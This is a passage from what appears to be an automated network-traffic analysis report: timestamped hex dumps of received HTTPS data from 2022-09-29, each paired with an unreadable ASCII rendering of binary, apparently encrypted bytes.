7c ad 7f 5f 2a 72 66 2a c0 0c eb 9e 7b b0 ba 7c 47 98 49 8b fe d0 7b 84 d8 44 7a 29 ed 8a 8f 7f 66 b3 1d 74 19 f7 ea 9d 09 46 01 b8 a9 ab 6c 23 b3 ea 12 03 56 fe ed 74 a2 d7 f5 c8 fc 4e ae
                                                                                                        Data Ascii: cG>77SR'X(,P`W/dxC(Lm%k-/|!J6ti.xO3y8Ao_gwAtS PNl=Zw]Tw`Iv\J.$GKa/O#I`*|_*rf*{|GI{Dz)ftFl#VtN
                                                                                                        2022-09-29 12:46:05 UTC7985INData Raw: 41 d8 74 0b fa 57 23 45 e1 6b 8c 55 26 59 45 8b a2 9a 13 05 75 fd 2e d1 29 23 c2 b0 a7 de 9e f3 99 f2 e7 8d e1 7e 1f 50 41 9f e2 88 e4 19 5e 85 8f 53 5e 72 00 69 b3 e9 b2 7b 85 5f 1a ba 39 c9 54 c5 4a c1 0f c2 cc 26 85 8b 23 51 89 b5 32 a9 c9 fa 24 cc 0c 7f 33 e1 94 d8 e3 2e e5 f1 7e 2a db 61 bb b1 2b b7 e7 e5 d3 30 53 53 d1 ae 2f 19 a5 04 cf a5 fe 04 22 24 d1 84 a2 4f 28 ee 23 b2 e1 9e 0b b0 48 24 e9 79 74 3d 05 23 89 4b 71 58 27 92 db 07 96 a5 f3 39 bb 17 be e5 17 fe 15 96 b4 fd f2 bd 04 d5 f0 e0 bd 00 49 13 35 66 21 e9 e0 21 a6 01 1d 44 d9 9b d5 d6 34 98 d8 ff 98 e4 07 3f 63 08 61 26 9b e7 a5 57 a1 26 71 87 7c 0e b0 0d a7 8f 8e 5f bb 29 a7 58 68 bd 36 38 03 e7 24 22 14 bf c1 29 52 2b 7a bc 4a 1b 7d 4f e8 54 17 eb b1 76 5f 37 51 ec 16 e7 70 02 8f c7 0d
                                                                                                        Data Ascii: AtW#EkU&YEu.)#~PA^S^ri{_9TJ&#Q2$3.~*a+0SS/"$O(#H$yt=#KqX'9I5f!!D4?ca&W&q|_)Xh68$")R+zJ}OTv_7Qp
                                                                                                        2022-09-29 12:46:05 UTC7994INData Raw: e5 a9 1b 7e 70 0b 88 c1 f2 70 b3 4c ce 75 d9 24 3e 4c 37 88 e1 56 22 de b1 a8 fb c1 a0 72 ed 1a 5d 52 cb 64 af 62 31 30 69 74 c8 8e 32 1e 6b 36 6f 92 e4 27 29 27 9a e7 e1 76 69 b3 ce ae 51 56 69 3c 67 f3 57 fa 38 dd 4d 26 c2 48 f9 59 73 08 6f 04 22 fe 4d d8 4c e9 2d 28 20 90 36 47 7f aa 95 6e 3d f3 4c ed 0e 9a 38 78 22 f1 e7 6c 16 c7 01 67 ff 29 1b 5f a7 76 cd 2c df 62 e0 f9 f4 0c 9e 16 d6 38 a4 f7 54 28 e0 37 3d 5a dd 31 20 74 08 8c fc 60 b2 dc bb 7e 98 44 80 f7 4c f7 bf 88 4e bd 71 7d e6 52 02 a9 2a 7e f0 b9 9b a2 9e 1b 6f 6d 4a 3b 73 4e 6f a1 ea 87 7e 53 92 d6 19 cd 3d 4c 1e 8c f8 f4 c6 14 40 a0 98 8f 50 82 70 2a 4f 02 b9 3d 7a e6 81 20 e0 21 db 81 33 53 5e ea f3 b8 df 56 59 dc a7 d6 c3 b1 5b d6 91 cf 64 e9 20 17 f0 36 ff ce 3f 32 73 56 25 cc fa dd 37
                                                                                                        Data Ascii: ~ppLu$>L7V"r]Rdb10it2k6o')'viQVi<gW8M&HYso"ML-( 6Gn=L8x"lg)_v,b8T(7=Z1 t`~DLNq}R*~omJ;sNo~S=L@Pp*O=z !3S^VY[d 6?2sV%7
                                                                                                        2022-09-29 12:46:05 UTC8010INData Raw: fa f3 94 ed d5 c8 fe 81 f4 3b 1e 3d 21 aa f8 73 8f b6 6a 7a 7f 36 71 1e 85 65 7e 86 c8 01 7e 6f 1f 21 97 87 08 f5 71 90 dd 82 1a 04 1d 00 00 e1 d3 29 f1 0f 01 6d 16 6d f2 19 94 b7 97 7a a0 37 e6 08 2e eb 50 06 d5 b3 7f 6a ed d9 38 98 3a 16 56 44 fc a8 22 10 8f 96 66 ce be ea 1b 81 6f 50 ab 86 a2 c4 ba 42 5c 76 bf 9e 97 de 81 df 7d a4 af 7e f2 de 0c 6d 7a b0 76 d3 b0 b5 bc 0e f5 20 a3 16 ef d6 2b 48 63 00 3c 94 d9 3c 76 66 34 14 1a 85 79 14 50 27 28 dd 2d 2f ba 54 49 c7 d3 27 00 fc 11 99 54 90 33 a3 95 45 c3 ec 95 7f f0 3f 4e 21 12 9f 68 34 a2 ca ff 92 2e da e3 48 85 a3 13 81 6f 2d 91 98 0b 68 67 66 20 41 dc 90 cd 29 da 53 f5 c4 a3 35 90 1a 95 e0 f4 2f 48 5c 9a ab 1f f1 0a 05 59 3c 5a 1e ef 3a 03 e2 a3 e5 aa ff 33 cd b5 ee 3b 8b ab 6c 03 9e 6e 78 61 7c c5
                                                                                                        Data Ascii: ;=!sjz6qe~~o!q)mmz7.Pj8:VD"foPB\v}~mzv +Hc<<vf4yP'(-/TI'T3E?N!h4.Ho-hgf A)S5/H\Y<Z:3;lnxa|
                                                                                                        2022-09-29 12:46:05 UTC8026INData Raw: 5d bf 46 86 a3 b1 06 b4 34 b3 e9 ec 47 f3 ce e0 07 7e 0b 0e 88 36 5d 8f f6 17 04 8a 55 0a c2 50 be 11 76 dc fe 8a 5c 1f 0e 97 7c b7 e0 54 ca 0d 8b 3e f4 8a 25 65 61 e5 2a d1 39 15 34 5e 3f eb 3e ef 6d 3f 47 86 b2 9a 16 8c c1 bd 6e 2d 3a 07 fe bc 89 b6 21 1b 0f 8e db ba 8d 60 79 39 18 f0 a1 51 7a 84 ab a0 6d 37 38 cb 49 3f ab 61 2a 6b e5 45 cb 7b 35 3f 7d 90 57 7a 89 2f a9 b0 8f ac 07 5e 8c 90 ff ac cb ea ce ab 49 be d1 0c 59 21 79 af 03 1b 36 15 7d 39 c3 d0 32 be 12 52 aa ca ff 42 8b 0a 78 3d 27 5b b5 9c df e0 9a af 96 5f 12 65 fb be 91 0e 8f a1 31 f6 f1 a1 f2 88 f2 9d f0 f1 76 57 d0 19 94 59 90 46 65 09 16 06 4d 28 94 2b c8 97 6f b1 75 00 5f cc 29 f5 a5 6a b6 aa a5 9c 65 9e 7b 84 40 ee e9 c6 bf 6a f6 b7 60 c9 52 34 cb 38 45 74 a5 b6 47 74 4a 35 c4 15 ed
                                                                                                        Data Ascii: ]F4G~6]UPv\|T>%ea*94^?>m?Gn-:!`y9Qzm78I?a*kE{5?}Wz/^IY!y6}92RBx='[_e1vWYFeM(+ou_)je{@j`R48EtGtJ5
                                                                                                        2022-09-29 12:46:05 UTC8042INData Raw: cf 8c 24 1b 15 18 33 f7 fc fe ce 8f fb 7e 57 f7 55 92 4e 02 3f 5d e0 f8 84 ba 58 8d df 87 24 6a 78 db fc 80 f5 5a 4b bd 88 2a f8 69 f3 17 03 85 09 f1 e2 53 6d 93 d1 48 8f c2 04 0e a5 04 44 22 ef 35 da 98 7b a7 25 6a 24 be e4 a6 ab ed 98 98 3e 17 d4 23 1c c6 23 5c b6 c4 84 e3 00 5f 7a 6e b9 43 77 3d f6 6e e8 58 4b 07 f0 34 18 dd 51 69 26 64 32 57 e5 34 8e 5f d7 1d 66 3a 77 f9 31 ac 38 81 6d 23 e2 c7 e6 99 e5 1f 5a 09 7d 8e 47 a2 dc 5c 2c ae e2 e3 96 03 d3 b7 de 11 79 12 b4 9a b6 02 a8 57 d1 8e ed b1 ce a8 cc 78 e8 89 23 13 77 36 03 c7 d5 50 3a b2 c8 aa e5 ec 2b 2b 6b 8c 72 fd aa 46 d7 f7 c5 3d 5f ed 36 19 f3 06 9e 4b 52 aa b6 05 df 92 aa a3 aa 0a ee d3 a4 ec 77 9c 57 59 54 fe 1c 12 c0 c2 c7 7d d7 2d 74 c7 ef f5 70 17 59 55 47 f3 99 47 56 ba 4c ee 25 60 ee
                                                                                                        Data Ascii: $3~WUN?]X$jxZK*iSmHD"5{%j$>##\_znCw=nXK4Qi&d2W4_f:w18m#Z}G\,yWx#w6P:++krF=_6KRwWYT}-tpYUGGVL%`
                                                                                                        2022-09-29 12:46:05 UTC8058INData Raw: fa b8 08 61 5f f4 37 3d 36 bd 31 56 00 8e 32 57 0d c5 da 19 e9 77 73 5f 5e bb 8b b7 da e9 05 48 b2 34 bd 15 3b a8 49 fc 08 39 45 6e e7 2c ae b9 87 8c 68 0e a1 2d 6e b9 e5 40 5f aa 4a e8 ab cb 66 1e 1c 1f f9 40 da 95 e2 05 69 a6 0b f5 9c 3c eb 94 b1 54 13 22 7c ec 44 af 75 d9 a0 c6 14 1b 27 f9 35 b7 4a cd e1 b6 da 0f 00 fe 3c 6f 21 80 e1 bc b1 62 80 95 ff 16 c7 f5 b3 29 78 c4 93 44 f6 24 85 64 79 a9 16 a5 79 a1 c8 03 1d e9 0c db ab 3c 12 d7 62 7e 5e 9e 8e 5a 5e b4 8c 84 b9 cc be e5 a3 6a a7 60 8b ee 1e e7 58 ff 4e 68 d8 85 ba 36 e1 88 66 aa 1c 3b 98 57 d7 54 2b d9 10 ba be ec 4c b2 18 00 df 8c d9 17 ca 69 2c 9d ea b7 d1 84 78 c2 47 8e f2 55 3b 0b 76 58 e8 b7 0a 51 96 68 e3 75 87 9b c7 7c db 59 47 d8 96 9f 92 21 3b fa 85 d7 6a 3f 88 6c f9 b4 ad 77 a9 11 0e
                                                                                                        Data Ascii: a_7=61V2Wws_^H4;I9En,h-n@_Jf@i<T"|Du'5J<o!b)xD$dyy<b~^Z^j`XNh6f;WT+Li,xGU;vXQhu|YG!;j?lw
                                                                                                        2022-09-29 12:46:05 UTC8074INData Raw: c1 76 34 d3 6c 4c 90 10 3b 0b c0 84 5f f8 72 0a c9 72 c1 67 8b bb f2 04 45 0e da ae 12 61 b3 d9 67 43 e3 26 de 91 cd 67 d5 e5 3f d2 d4 15 ce 5b b9 de 26 0a 97 3f 5d 0e 31 ce 61 d8 ba fc 6d ef 24 29 5d 80 e4 e6 02 22 b9 6d 07 7a 9f fb d8 3d 43 f4 4b ed 5a cf 7e a8 6a 05 d3 63 9e 37 73 ed 75 66 48 5f 7e 53 e4 ff 97 f0 a6 13 4a 14 e4 5e 10 dc e5 ec ce 9a 75 ff b6 1d 99 26 9b 85 4f 22 f8 9e 7c b6 49 75 8f 64 c3 92 a2 ec 9a 8a 8a 0b b3 dd 9c 1c c2 54 99 08 3e 5b f3 90 f6 f7 e6 d6 1e 6a f5 9f 83 66 d5 5e 97 1e 0a db f4 aa 03 e3 f3 d4 d0 d7 da cb 25 9d 38 29 a6 48 13 0d 0d 31 d1 44 d1 3e 3e 86 be 0b 41 61 5c 24 12 de d5 23 58 1a 2b e9 49 77 ac 95 11 c1 9f a7 43 3b f7 c9 68 a0 11 a9 c3 d3 65 ff bc e6 0f 8f 15 41 f6 1c 8c 7d ab 61 64 12 17 4a 2a b8 0c b9 5c fd 6c
                                                                                                        Data Ascii: v4lL;_rrgEagC&g?[&?]1am$)]"mz=CKZ~jc7sufH_~SJ^u&O"|IudT>[jf^%8)H1D>>Aa\$#X+IwC;heA}adJ*\l
                                                                                                        2022-09-29 12:46:05 UTC8090INData Raw: b5 e5 6c 85 b6 40 2d 49 3c 75 1d 74 a7 36 fc de 3f 83 1f 94 5f 10 e9 9b af 36 c8 94 64 32 8c 59 9e 8d 2e 00 42 d1 84 6d 03 57 13 77 82 21 5f 50 4b ac a2 5b 03 02 84 93 04 0a 29 13 59 29 24 dd 0b b1 fe ea 81 75 ae 3e 78 52 32 3f 2e 32 f5 c7 39 09 96 99 52 72 e1 bb 99 c3 1a 39 cc a4 a4 82 e7 da 62 ed 40 eb 98 ce a6 51 61 f7 9a 83 56 99 46 32 e0 a7 23 38 76 7c ed 82 7a 03 27 26 a7 ea 1f 7f 01 a8 98 a9 58 39 41 90 b2 67 27 bf b7 04 17 e0 ff ec ff 2a 22 ae 12 0f a2 56 56 c3 15 db 3c 7e ea 31 5c 8c 2b a4 9a d7 98 9a 49 3f 77 30 60 e1 dc 0f b7 78 17 1d 3a b8 3a bc 89 1f 76 c2 dd 98 8d d7 61 ed dc d7 aa 7c 7a 91 7e 36 91 82 f6 43 d3 56 d3 bd 1f 26 99 ee 87 cb 72 e4 f4 f9 1b 12 a2 64 f7 e8 d8 34 cc 93 cb 0d 06 08 b9 e4 43 f1 8a ec 37 bc c7 3b a1 d9 93 b7 af 3d 17
                                                                                                        Data Ascii: l@-I<ut6?_6d2Y.BmWw!_PK[)Y)$u>xR2?.29Rr9b@QaVF2#8v|z'&X9Ag'*"VV<~1\+I?w0`x::va|z~6CV&rd4C7;=
                                                                                                        2022-09-29 12:46:05 UTC8106INData Raw: 20 50 2d a0 18 b2 01 89 a6 d6 82 33 57 c6 2e 80 d4 72 46 d6 7e 87 c5 79 a0 30 84 c6 7e 04 7d 76 d9 a4 80 5d fc 6f 76 2a 04 3d ee 89 68 9f 34 6f d2 69 54 3c ff 72 7c 9a bf f1 ed 2c 9a 19 34 6f fc 09 91 41 fe a9 59 93 b9 ba 7c f2 2f 06 17 cb 23 3c 4f 43 26 78 45 2f d7 be 9c 92 9f 5f 15 e1 8e 0c b2 d1 de d3 9d 80 4e 70 74 48 d2 9b 9d ec bf f6 61 3c 78 47 42 8f f1 07 17 1d 31 0f 04 be e0 0b 51 f6 2d 17 bc 93 ba 40 b3 0e 42 a1 1a e8 d6 bb 5d 6b 07 a1 46 57 a7 9a a3 2b 0a 5d 0c 6b de 5a 96 87 e0 83 12 c1 76 32 71 4b 5b da d8 b8 da 7d 61 28 d7 90 2b ce dd 1e 2c ba 54 a8 4d 7b 30 c6 92 67 7d f2 50 f3 84 b8 84 4b 44 6f 99 9b 82 0b 89 2a 50 9c b8 37 ec b5 28 bc 47 07 b9 1e 7b 3a 3e 65 0d 4a 5a a7 60 cd fe c2 27 20 0e ea 90 b7 d6 65 e6 29 f4 21 3c b5 6c 8e 59 c1 2f
                                                                                                        Data Ascii: P-3W.rF~y0~}v]ov*=h4oiT<r|,4oAY|/#<OC&xE/_NptHa<xGB1Q-@B]kFW+]kZv2qK[}a(+,TM{0g}PKDo*P7(G{:>eJZ`' e)!<lY/
                                                                                                        2022-09-29 12:46:05 UTC8122INData Raw: e9 a9 d4 5b 7d 93 19 f5 51 ad dc f4 b7 91 79 19 4b c1 15 37 b9 5f 30 82 8f 6a 3f 73 45 34 e1 23 77 ce 14 8d 2c 8c 4b 00 77 39 f7 00 d7 71 f7 63 d9 54 87 e9 f2 b2 27 1d 91 59 e8 5c 59 7e 5d 0e 30 b6 a2 01 1a 3f 5c d8 2b 9b 56 46 6d c0 7d 16 1d 8f 4c e3 33 d0 d5 f9 fb 04 0d a8 c5 42 61 4c 5c 14 a8 d7 d7 bd e2 85 f0 8f a5 2f 77 15 07 aa 78 71 bf 4b 22 8c 68 3d 3b 49 0f 93 b3 1b 0e d5 d6 78 62 53 8c 02 9a ca e8 d0 0a a5 f5 cd 89 ae d0 74 b2 63 2b a6 b7 c9 f6 0c 0e c7 f9 34 a3 78 d6 c9 62 43 16 41 b5 4b 9f 94 e4 c4 af ba 41 15 17 55 ed 72 a2 92 ad 43 da 4d bc d8 60 d3 c0 66 df 6c 52 3d 4b b3 0d 51 d0 8d d6 24 2b 45 25 1c 0b cd 7f dc 97 82 c6 cb b0 a6 10 75 32 df 29 33 af a2 4b 4a 38 bd 4e f2 15 bb 08 bf c2 2d b7 03 45 bc 3a 39 3a 53 f7 37 af 95 59 7a ca f8 c8
                                                                                                        Data Ascii: [}QyK7_0j?sE4#w,Kw9qcT'Y\Y~]0?\+VFm}L3BaL\/wxqK"h=;IxbStc+4xbCAKAUrCM`flR=KQ$+E%u2)3KJ8N-E:9:S7Yz
                                                                                                        2022-09-29 12:46:05 UTC8138INData Raw: e4 6c 13 b6 dd 05 17 f9 d8 2d 47 35 e2 36 2c 77 82 fe 95 56 cb 6f 99 79 a9 49 39 88 60 9c f5 74 13 cc 5d c9 9e f4 f1 f9 3c 11 dd e1 bd be 30 54 66 37 c3 df 78 f9 3b d2 3f 47 a5 8e 75 95 9e fb e4 cb 5e ec a7 e3 fb 82 62 9f e4 fd e4 07 8b 33 5b e2 c3 f0 9a 27 b8 55 5b 2f c6 57 e3 1c 91 a3 0c e8 ef 3f 6f 31 3b fb 6a 4c 80 7b f3 24 22 6f f4 1a 83 60 81 cd b4 d5 c0 6f d0 f2 31 21 ae bc 94 9e 6c 94 1f 6a c1 e7 02 e5 ec 11 4d 7c fa 74 48 53 b7 01 86 57 ef 31 0e e5 52 29 f9 d2 7a cb c4 f8 3f f8 a3 d2 f2 aa 62 7b d0 8e dc d6 45 da bf b8 a3 8d 9c f6 3e 73 90 82 af 2a e2 0b 31 82 bc 43 75 3b d7 94 fe a0 18 bf de 00 e9 f8 54 f5 6e 4c 77 7e 09 4e f6 4c 3f d9 b2 fc 6e 5f 8a 04 9a 0e c6 9b a7 07 84 50 d7 51 64 38 cc 35 2d 69 fc c5 f3 be cb 05 a9 7e fc 3a 0f f5 65 8f d4
                                                                                                        Data Ascii: l-G56,wVoyI9`t]<0Tf7x;?Gu^b3['U[/W?o1;jL{$"o`o1!ljM|tHSW1R)z?b{E>s*1Cu;TnLw~NL?n_PQd85-i~:e
                                                                                                        2022-09-29 12:46:05 UTC8154INData Raw: f2 a8 63 84 94 4b d4 05 b1 e2 70 3a 2d e5 0e ef ad c7 cb fb 2a f7 3e 7b 7d f6 3b e0 f2 d8 df c4 7b b1 80 f6 4e 39 4e 32 d5 f4 3d b8 26 2b bd 0d 53 4e da 04 5b 73 70 30 f9 b9 03 20 99 1e db e4 96 9e a0 44 87 78 4f 06 48 3e c7 77 9c 3a bb 40 85 6b 40 f8 6b b7 80 4f f1 de d6 bf dc 03 93 3f e8 33 04 f9 c8 5d b1 43 40 a8 5a 3f 0f 73 8a 37 4d 4f eb 9a 37 b6 88 5c 03 d4 c3 ec fd d4 80 be 5d dd 25 11 6c 32 38 51 5d 39 3a 9c a8 5c 98 22 e1 07 78 63 ea c6 99 9c f1 1d 36 a4 8d 09 62 15 e6 3f f4 ef 4d c2 ca 97 0b 33 e2 f7 57 fc c0 6e e0 51 b4 58 6b 33 75 2d 95 c6 70 85 3a eb ef 83 15 01 91 d7 95 23 e1 30 84 6a a5 77 aa 29 d0 72 6f 68 13 c3 d8 60 ca 03 62 16 8e 1c 7c e2 04 77 61 42 ea aa ad 8c 5f 57 20 2d 5d 56 f6 b9 fa 98 30 a6 5f 5e b8 99 46 44 1d 85 2c a7 0c 30 c0
                                                                                                        Data Ascii: cKp:-*>{};{N9N2=&+SN[sp0 DxOH>w:@k@kO?3]C@Z?s7MO7\]%l28Q]9:\"xc6b?M3WnQXk3u-p:#0jw)roh`b|waB_W -]V0_^FD,0
                                                                                                        2022-09-29 12:46:05 UTC8170INData Raw: d6 b7 b1 3d f2 94 fc af 03 25 5a 4a 67 6a a7 b9 c6 2d 65 d0 a6 77 19 be 32 42 72 ed 35 c0 d1 5b c9 ab c7 01 6d 64 d3 e7 8f 57 ad d6 fe 9f e4 70 12 b8 0b 50 f7 00 80 d6 4a 8e bb fa f3 79 99 89 6f a3 98 f4 65 e5 4f e9 0c 4f 68 6f 79 c4 f1 19 77 e0 26 c7 82 9b 38 72 b4 99 45 34 58 b7 09 08 88 16 8c 07 ce c7 83 10 4b 6f 97 bd 2f 62 08 d2 cc 5b 3a a7 87 d2 0b 1f 96 08 5f 31 fb 5b a5 5c 08 2b bf 0b 7a 9f 3c 3c 9c d3 b0 9e 29 52 e3 60 7a 8d d2 bc ef 35 78 51 de a9 b9 72 91 12 3b 93 75 c0 67 72 20 a5 fd c9 a9 4d 5f 8a ce bd 8d 9c f6 40 39 58 ff 8d cc 5d 39 c1 a1 74 d1 e2 88 23 71 d1 f6 e0 87 09 fd e8 10 00 3f dd f8 c5 b2 ce c1 30 d8 bc 4b 67 63 0a ca 64 ce e7 50 ed dd c2 0d 30 76 80 ec d9 03 fb 93 9f da c8 ef f7 ab 41 16 4d 06 07 17 64 6e 82 17 0d 0a f7 41 89 5f
                                                                                                        Data Ascii: =%ZJgj-ew2Br5[mdWpPJyoeOOhoyw&8rE4XKo/b[:_1[\+z<<)R`z5xQr;ugr M_@9X]9t#q?0KgcdP0vAMdnA_
                                                                                                        2022-09-29 12:46:05 UTC8186INData Raw: e9 88 b2 71 d0 2e 31 2b 92 a5 df 11 b2 51 7c 5a 1c 1b 6a 03 b0 be b3 98 d0 b2 10 19 af 83 c1 32 91 e5 75 e2 48 22 9c b3 7e b3 bc ef 42 6c b1 58 d7 92 a9 c2 6f 97 d3 b8 3c c6 f2 83 c0 15 b4 c9 83 ae 1d e6 69 06 2e 4d 09 0c 5f 08 57 02 19 ad 81 cf 8e ee 22 d8 ec 03 a0 cc 07 67 c3 aa 82 c8 b1 ac 7d 7c 6d d1 c9 53 fb 11 d2 20 70 58 5b b7 8a e9 ad 57 a2 b3 7c 4a 01 4c ff 22 f0 5a 2f 3f 97 e9 02 0c 59 30 f5 db 3f d6 f0 ba 57 da f9 fe 6e 62 51 80 cb 9f 5d 78 72 49 3e ac 55 52 bc 04 c0 08 f6 c4 29 b7 98 77 1f ac 3a 2c 96 b1 a1 5e ba 64 8e fe db 9c e1 34 67 b5 6c 21 11 03 35 de bf f6 d7 d5 27 fe f7 cc 6a 7c 79 6c 86 e2 b2 cd f7 e7 23 e7 2d 66 27 2e 33 97 3a 20 9d ce f3 5d 15 c2 dc b9 fb c5 db 5f 0e 16 a8 44 67 e4 ac 62 e7 2d 5c a4 d4 8a 42 26 52 77 73 fd 21 94 00
                                                                                                        Data Ascii: q.1+Q|Zj2uH"~BlXo<i.M_W"g}|mS pX[W|JL"Z/?Y0?WnbQ]xrI>UR)w:,^d4gl!5'j|yl#-f'.3: ]_Dgb-\B&Rws!
                                                                                                        2022-09-29 12:46:05 UTC8202INData Raw: 1b 11 2b 25 67 b1 d2 6b e1 75 48 cf b3 7c b2 65 c7 c2 fd 12 3b 4c 9e 43 37 f0 ca 5d 69 ca c5 f3 05 25 d2 c9 3d d6 b1 08 d4 69 95 9a 93 99 0e 79 ae c1 ba ed 58 12 6d 6e a8 17 a7 7f 1a ed af 55 89 d1 95 56 3a 95 2b e8 a6 d3 98 40 ea 77 19 6b b7 e0 fe 7b c0 9f 91 60 af ed 2d f6 3b 97 3e 82 bd 61 37 7d 75 b9 49 fa f1 54 98 b1 24 72 b0 f8 a6 00 b1 ef a7 21 34 fc 13 46 e3 c2 ea 46 5d c2 05 38 01 13 e6 94 f4 5e 3f 6d 50 1f 99 96 b1 89 ca 7c c7 02 6d bf 39 18 bc 24 f2 44 c4 38 d1 16 ea 02 59 3b db 73 5e 2a cc 6b c5 44 b3 2e 3a f0 69 7e 27 ac 3f 4b 8c 8a d7 a7 d3 4d a8 87 97 eb 21 af 49 2d 5d 5b ae ce c7 81 f1 49 93 9f 24 2f 65 3b 98 20 10 f4 cd 94 01 ec f6 57 c9 34 8d 39 d5 b4 d2 20 50 fe c0 0e 5e 10 a0 8c 40 38 21 a5 c3 0f 27 c9 cf 07 8b 61 62 2e 35 04 b6 a6 05
                                                                                                        Data Ascii: +%gkuH|e;LC7]i%=iyXmnUV:+@wk{`-;>a7}uIT$r!4FF]8^?mP|m9$D8Y;s^*kD.:i~'?KM!I-][I$/e; W49 P^@8!'ab.5
                                                                                                        2022-09-29 12:46:05 UTC8218INData Raw: 11 76 93 2d 70 20 13 bd 42 50 37 d0 48 36 8b f3 9a de 3a 09 d4 3c a0 16 ae e5 24 32 e0 96 3e c7 46 23 c5 4e 67 7f 12 1b 41 06 1b 5f 58 0e a6 52 ef a7 3e 67 40 43 b1 7c 27 cb 27 ad 32 b3 a2 ee 4e e5 44 9d 9f ea d9 a2 d7 34 fe eb 0a 82 b4 7a c5 66 d3 99 25 60 ad 24 f7 dc 70 3e 63 c1 2a c8 c5 63 2e 1c 18 64 5a 53 ae 3b c1 6a 6b d5 b8 34 73 97 ea 0b c5 62 ec fe ab c2 c7 f6 cf 74 9e 1d c3 4f 09 cd 28 3d 72 8d eb 76 9c c3 90 d6 6a ad d9 48 33 44 16 dd 2d 5e c4 b9 b6 ba 64 d2 43 7a 73 33 fa 6b f8 96 af d0 0d 1c be bb 17 9f b8 30 86 30 52 28 6d a3 21 cf 32 6d 02 bc c6 3a da a1 07 59 2a 25 cb 4e d1 d9 76 e8 f6 d3 f6 c5 66 2c c4 d9 63 4f 62 24 fb 61 27 cb b2 2a f3 ab 84 d3 c2 73 a4 f0 54 21 4b e4 a6 e8 d7 d1 20 d9 fc e5 41 13 12 90 84 52 c1 7d 72 34 20 6e b1 d4 e6
                                                                                                        Data Ascii: v-p BP7H6:<$2>F#NgA_XR>g@C|''2ND4zf%`$p>c*c.dZS;jk4sbtO(=rvjH3D-^dCzs3k00R(m!2m:Y*%Nvf,cOb$a'*sT!K AR}r4 n
                                                                                                        2022-09-29 12:46:05 UTC8234INData Raw: f2 05 6d 9f 8e 19 05 8c ec 7a 51 80 1c 94 17 7f d9 a3 09 5a 61 32 84 10 4e c9 f5 0a f6 18 8b e7 77 80 6b f0 de 01 8e 57 29 ee 2f 3a f7 41 9b a9 08 aa 5e bd f0 ea a2 3d d1 85 5c 14 4d 0e e0 61 7e 33 f1 f4 5d 6e 50 6a 3e 0e a2 48 93 34 ec da 45 a3 5a 98 a2 4e d1 bd cc d8 20 13 7b 5c 08 2d 5b 94 70 5a 4e ef 6e e1 51 19 e3 51 0a 6b 11 08 8e 16 5f 44 90 2f 68 0a ff 5c c4 6a 03 3e b3 97 00 d3 e0 23 34 69 66 c6 ba 05 25 90 ec 9c 44 20 8b d7 73 bf 10 95 6c 3b 62 4b 56 3c f9 77 97 44 06 a4 67 e9 db 84 7d ef 3f f5 b0 41 ae 4b e8 c0 15 04 cc 25 e4 80 cf 59 6c b9 bf 98 4c d4 4e 42 09 04 65 a0 bb 9d 77 2c 96 dd 9f 18 e3 79 29 4c a2 3f 7f 3d 02 50 f5 b2 a2 bb 55 71 78 41 52 9c 18 70 ed 21 0b af db 75 56 03 fd 84 a4 98 0f bc df ec aa 34 81 b8 ee 81 41 a5 de d7 85 84 dd
                                                                                                        Data Ascii: mzQZa2NwkW)/:A^=\Ma~3]nPj>H4EZN {\-[pZNnQQk_D/h\j>#4if%D sl;bKV<wDg}?AK%YlLNBew,y)L?=PUqxARp!uV4A
                                                                                                        2022-09-29 12:46:05 UTC8250INData Raw: 3b 63 93 26 54 2d 65 c4 34 05 4a 54 73 a8 04 d9 b6 9d c4 54 2f a4 2a 8b f4 46 56 54 7c 69 91 db 32 93 82 10 52 57 69 ea 21 19 fe 4f e5 b6 5d 5e ad 1c 46 8d 7d d4 4c 42 ae d0 1a 10 32 65 24 d6 a8 21 77 59 d3 82 58 5f 37 65 81 52 1c b6 82 a5 3c f1 15 00 e7 94 bf de 2c 2d 26 ac 98 00 67 bf 0e 36 d9 bd 8f d1 9c 0e f3 28 29 10 b2 9c d3 95 43 bc 0f b6 79 99 bc 7b 2a 71 21 5f a8 9d 8a 8b 88 1f c7 8c 85 45 c9 a9 35 5c b3 ca 7e c7 53 cf a6 a4 98 61 c9 07 a9 e8 0a bd 71 fd 8c 57 32 19 2c 16 38 1c f1 64 99 bf 64 45 ea 89 d7 13 db 42 7e a2 13 86 29 7e 42 59 8e c7 ca 0e 27 77 45 b4 13 97 df be ac be d9 4a 83 35 fd d6 a5 62 5f 2e f9 90 38 61 be e2 ad 30 13 6a 98 b5 89 a5 75 b2 53 2c 6c 03 f0 83 f8 3e f1 59 10 f2 6d d3 db 75 42 72 33 47 e5 06 c4 3d b8 fc da f6 45 a3 1c
                                                                                                        Data Ascii: ;c&T-e4JTsT/*FVT|i2RWi!O]^F}LB2e$!wYX_7eR<,-&g6()Cy{*q!_E5\~SaqW2,8ddEB~)~BY'wEJ5b_.8a0juS,l>YmuBr3G=E
                                                                                                        2022-09-29 12:46:05 UTC8266INData Raw: 95 1d d8 a8 bc bb 69 d5 1b 42 0f 11 8a cb 39 78 3b 72 17 3a 4f be 19 af 4c 6c 53 30 6f 76 15 c0 8f 7d f8 c4 ac a0 09 5c a0 ca b6 b9 38 f8 71 f7 2d 12 1f e0 87 91 31 be f0 df 18 22 fb 6c cc ed 77 e5 92 6a e8 4c c1 d5 35 95 04 a8 ac 6d 8a 92 3c 17 71 5f f6 c7 ff a4 a2 37 62 89 23 9e 27 77 f6 81 00 62 6a c0 39 47 08 fe 12 b7 0e 6f 73 b7 ee c0 40 55 ee 66 c8 2a 8c ae a2 5e 4c 49 df 14 6f 95 9e e8 38 f7 13 9a e9 67 62 d8 a2 cf c2 94 de b2 3c 51 d1 da 55 36 32 27 d9 a2 cf 90 81 04 29 40 be ca 7c 2b 75 49 13 d7 67 44 2d 71 0d e9 0e fe f3 07 cb f3 b2 b8 5e 70 5b 18 d8 59 63 6e 25 b9 4d ed 1c a3 41 21 46 53 02 eb 95 19 8f 93 ea 2e 14 7f c4 ec fe 83 d0 85 a9 a7 7e 5a 8a 7b 0a e4 e6 39 d3 30 62 29 af 80 a3 d0 50 67 4a 69 3b ec 70 bd 00 40 f2 4f 49 93 80 1b cb 8a 5f
                                                                                                        Data Ascii: iB9x;r:OLlS0ov}\8q-1"lwjL5m<q_7b#'wbj9Gos@Uf*^LIo8gb<QU62')@|+uIgD-q^p[Ycn%MA!FS.~Z{90b)PgJi;p@OI_
